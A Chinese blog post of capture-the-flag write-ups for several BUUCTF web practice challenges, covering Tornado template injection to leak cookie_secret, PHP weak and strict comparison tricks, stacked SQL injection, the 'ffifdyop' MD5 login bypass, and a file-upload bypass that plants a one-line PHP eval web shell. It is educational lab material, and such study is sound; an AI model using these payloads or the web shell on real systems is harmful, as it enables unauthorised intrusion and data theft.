BUUWP

最新推荐文章于 2023-08-10 12:59:46 发布
最新推荐文章于 2023-08-10 12:59:46 发布
阅读量304 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jojohacker/article/details/107656571
版权

[护网杯 2018]easy_tornado

/flag.txt中提示flag in /fllllllllllllag
/welcome.txt提示render函数(联想到SSTI模板注入)
/hints.txt提示md5(cookie_secret+md5(filename))

这里有个render函数详细介绍

https://blog.csdn.net/qq78827534/article/details/80792514

根据提示我们需要构造一个形如
url/?filename=/fllllllllllllag&fliehash=******
的payload,而其中
filehash=md5(cookie_secret+md5(/fllllllllllllag))
因此只需要拿到cookie_secret即可拿到flag
首先构造第一步url/file?filename=/fllllllllllllag
结果报错了
在这里插入图片描述
根据测试,当msg=1时,网页就会显示1,同时当我们键入*-/等符号时,会回显ORZ因此构造msg={{ handler.settings }}
在这里插入图片描述因为根据{{}},可以推测出是handler.settings对象
因为handler 指向RequestHandler
而RequestHandler.settings又指向self.application.settings
所有handler.settings就指向RequestHandler.application.settings

payload=url/file?filename=/fllllllllllllag&filehash= md5(cookie_secret+ md5(/fllllllllllllag))
通过两次md5加密得到最终的hash值
payload=url/file?filename=/fllllllllllllag&filehash=7c76e7228469d181e0ea0063726e1584

[ACTF2020 ]BackupFile

提示Try to find out source file!因此联想备份文件www.zip index.php index.php.bak bak.zip(最后测试出来时index.php.bak)
打开以后是一段php代码

<?php
include_once "flag.php";
if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
    echo "Try to find out source file!";
}

这里考了一个php弱类型比较,因为int和string无法直接比较,所以将$str的第一串数字后会将后面的全部截断。因此GET一个key=123即可

[强网杯 2019]随便注

这道题目考察了堆叠注入
由于做完以后靶机的环境改不回来了,所以无法再复现一边,只能给个链接WriteUp
其中的特别容易忽视的细节如
1.反单引号:``
在windows系统下,反单引号是数据库、表、索引、列和别名用的引用符。例如 eg. mysql> SELECT * FROM()tabe()WHERE()id ()= '123' ;
这里用()代替反单引号,因为打不出来。。。。

[ACTF2020 新生赛]Upload

把鼠标放到中间,发现灯泡亮了,是文件上传漏洞,传了一个php文件
在这里插入图片描述随便传个1.jpg文件,用burpsuite抓包在这里插入图片描述添加了一句小马<?php eval($_REQUEST['cmd']);?>并将filename='1.jpg'改成1.phtml放包以后回显1.phtml上传成功
在这里插入图片描述然后用蚁剑连接
http://3a1cf6ae-456f-46d9-94e4-1ef71377e4d9.node3.buuoj.cn//uplo4d/b284530b9d2636c66a4e6f32315ccac3.phtml在这里插入图片描述然后在根目录下发现flag

考察了php别名绕过

[BJDCTF2020]Easy MD5

先抓个包,然后突然hint发现hint中的藏了一个SQL语句
select * from 'admin' where password=md5($pass,true)
这里需要用password=ffifdyop来绕过,因为ffifdyop在hash之后是
276f722736c95d99e921722cf9ed621c,而这个字符串的前几位是' or '6,在和sql语句拼接后形成select * from 'admin' where password='' or '6xxxxx'相当于一个万能密码可以绕过MD5()
然后我们进到了这样一个界面在这里插入图片描述查看源码看到

<?php
$a = $GET['a'];
$b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.
php?>

这就是一个简单的MD5碰撞。
构造payloadurl?a=QNKCDZO&b=s878926199a

然后又看到了一段代码

 <?php
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}

这考察了一个MD5强比较
如果传入的两个参数不是字符串,而是数组,md5()函数无法解出其数值,而且不会报错,就会得到===强比较的值相等
所以构造payloadparam1[]=111&param2[]=222去POST得到flag

DDD的爱徒
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF WP
Panacea
04-25 1287
MISC 最简单 首先使用winrar修复伪加密 查看文件尾,发现是png结尾 png知识参考https://www.cnblogs.com/senior-engineer/p/9548347.html 更改文件尾得到图片后使用16进制转字符串得到flag 十六进制转字符串网站:https://www.sojson.com/hexadecimal.htm Misc-A_Beautiful_Pi...
BUU-CTF——WP(MISC[21~n])
hahaha233330的博客
10-06 1182
挑战BUU,贴一下网址:BUU-CTF MISC 继续~ 在线工具:Ook!、brainfuck转字符 21. FLAG 22. 另外一个世界 拖入010editor,拉到最后发现:01101011011011110110010101101011011010100011001101110011 二进制转字符串得到flag。 23. 假如给我三天光明 看最下面一排,感觉是盲文,去找盲文表对照即可得到密码kmdonowg。 解压后得到音频文件,拖入Audacity,猜测对应摩斯密码:-.-. - …-.
buu web部分wp
qq_63267612的博客
08-07 366
查看wp发现存在ssti漏洞,在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显。在使用sqlite_master时使用错误的语法,sqlite将会忽略后面列的名称,无论列的名称是否真实的存在,除非在列之间放置。在使用sqlite语法的时候列名是可以加方括号的,是为了和mysql语法兼容。打开以后是一个登录的网站,不能用admin注册,随便用个别的,登陆后,拿到redis的密码root,打redis,这一题的考点是在。...
ZIP文件组成
qq_45951598的博客
11-15 423
压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 1、压缩源文件数据区 在这个数据区中每一个压缩的源文件/目录都是一条记录,记录的格式如下: [文件头+ 文件数据 + 数据描述符] a、文件头结构 组成   长度 文件头标记 4 bytes (0x04034b50) 解压文件所需 pkware 版本 2 bytes 全局方式位标记 2 b...
buu几道题的wp
qq_51936244的博客
02-01 518
Buu】[BJDCTF2nd]elementmaster 翻译图片文字,得到要素:118元素 检查页面,发现两个十六进制,翻译得到Po.php 访问发现里面只有一个点 考虑到Po为元素名,可能要遍历化学元素 import requests import time url='http://c0c35ceb-d134-4829-b954-83b4d9c69807.node3.buuoj.cn/' flag='' element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N',
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 762
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
buu re部分wp(一)(未完待续)
m0_51357657的博客
01-30 301
抽空来总结一下这几天做的几道题,因为对大小端序不是很了解总是解不对,唉,认识到了要注意大小端序的重要性。 (大一废物,写的不好还请师傅们指点!) 一、[GWCTF 2019] xxor 主函数就是把我们输入的六个数数变换后的数和sub_400770中的六个数进行比对,相等就对了,所以顺着逻辑推回去。 关键的地方都写注释了,看图哦~ 所以先要把变换后的数组解出来,看到有大佬用的z3,我太菜了,不会不会。。。其实三个方程三个未知数,手解也不难(好吧,我承认我还是高中水平呜呜呜。。) 然后把伪代码复制粘
BUUCTF 随便注WP
小白渣的博客
12-19 1173
首先我们先看到题目,我们由题意可知是sql注入 于是用 ’ 试试 然后我们尝试一些注入的常用的词汇 发现都被过滤了,但是尝试一下 堆叠注入就可发现 ';show tables;# 看了前面大佬的博客可以 绕过关键词过滤 关于MySQL中的预处理语句原理与使用,这篇文章讲解的比较详细:MySQL的SQL预处理(Prepared)本题中由于可以使用堆叠查询,并且需要使用SELECT关键字并绕...
BUUCTF web第二页WP
东隅的博客
09-12 536
写一下我得理解,首先这里的id是障眼法不用管,foreach遍历GET数组,传到complex()函数里,$str匹配$re这个正则表达式并且替换为\1,这里\1有特殊含义,e模式下我们的$str会被存入缓冲区,而这个1会导致回调缓冲区的内容,这个时候如果$str是我们想办法利用的getFlag(),再get传入cmd,代码执行不就成了么,最后要说那个$re写成全部匹配就好,像这样: \S*)/),所以会一直递归,?),也就是它把类似a(b(c()d())))这种的全替换为空后只剩下;
BUUCTF之[ACTF2020 新生赛]BackupFile 解题过程
weixin_44632787的博客
06-18 5065
在PHP中: ==为弱相等,即当整数和字符串类型相比较时。会先将字符串转化为整数然后再进行比较。比如a=123和b=123admin456进行==比较时。则b会只截取前面的整数部分。即b=123。 所以,这里的a==b是返回True。
[ACTF2020 新生赛]BackupFile
记录学习,一起进步
01-16 934
[ACTF2020 新生赛]BackupFile
【学习笔记4】buu [ACTF2020 新生赛]BackupFile
weixin_43553654的博客
05-08 491
打开后首先看到一行提示,提示说让我们找到备份的文件,找找看,最后试出是index.php.bak,下载下来后打开看看。 <?php include_once "flag.php";//包含一次flag.php if(isset($_GET['key'])) { $key = $_GET['key']; if(!is_numeric($key)) {//如果传入值不...
BUUCTF刷题记录(3)
bmth666的博客
03-20 3298
web [SWPU2019]Web1 [ASIS 2019]Unicorn shop [ACTF2020 新生赛]Include [安洵杯 2019]easy_web [WesternCTF2018]shrine [ACTF2020 新生赛]Exec [GXYCTF2019]禁止套娃 方法一:array_flip()和array_rand() 方法二:array_reverse() 方法三:使用session [GXYCTF2019]BabySQli [CISCN 2019 初赛]Love Math
BUUCTF百题刷题总结(一)
qwzf
09-14 2046
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 7805
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
CTF刷题03
Atkx's Blog
10-04 824
头等舱 访问题目链接 还真是什么也没有,查看源码 抓包一下看看 查看一下Response,果然flag在这。 你必须让他停下 访问题目网址,发现网页一直在跳动 查看网页源码 直接进行抓包,抓到的包大部分是这种404 Not Found包。 调整一下思路,从长度入手,查看length最大的包 查看源码,flag就出来了 ...
buu刷题记录
missht0的博客
01-18 804
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')
buuctfweb刷题wp详解及知识整理----【网鼎杯】随便注(sql注入)
weixin_45784586的博客
02-09 953
最近一直在学sql注入 尝试练练ctf题中的sql注入,因为自己自动化工具还是不太会玩,所以选择一些纯手工注入的题在这里插入代码片 自己走过的路加wp指导的心路历程 0x01 注入检测 1' 报错 1'# 正常 1' or 1=1#正常,表中所有数据显露 1' and 1=2#报错 1' and 1=1#正常 可以得知存在注入 0x02 尝试获得该表中的列数 1' order by 1# 通...
BUUCTF题目Web部分wp(持续更新)
最新发布
苦行僧的妖孽日常
08-10 1146
BUUCTF题目Web部分的writeup(持续更新)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值